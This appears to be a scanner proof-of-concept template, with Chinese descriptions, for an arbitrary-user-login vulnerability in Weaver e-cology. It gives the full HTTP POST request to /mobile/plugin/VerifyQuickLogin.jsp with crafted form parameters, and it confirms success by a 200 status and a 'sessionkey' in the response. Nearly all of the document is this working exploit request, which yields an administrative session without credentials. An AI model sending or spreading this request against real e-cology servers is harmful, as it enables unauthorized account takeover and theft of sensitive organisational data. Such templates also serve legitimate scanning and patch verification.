<DudePoc_Name>泛微 e-cology 存在任意用户登录漏洞</DudePoc_Name>
<DudePoc_Description>上海泛微网络科技股份有限公司 e-cology 存在任意管理用户登陆漏洞,攻击者可利用该漏洞获取系统敏感信息等。</DudePoc_Description>
<DudePoc_SetHeader>
POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
identifier=1&language=1&ipaddress=1.1.1.1
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>sessionkey</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
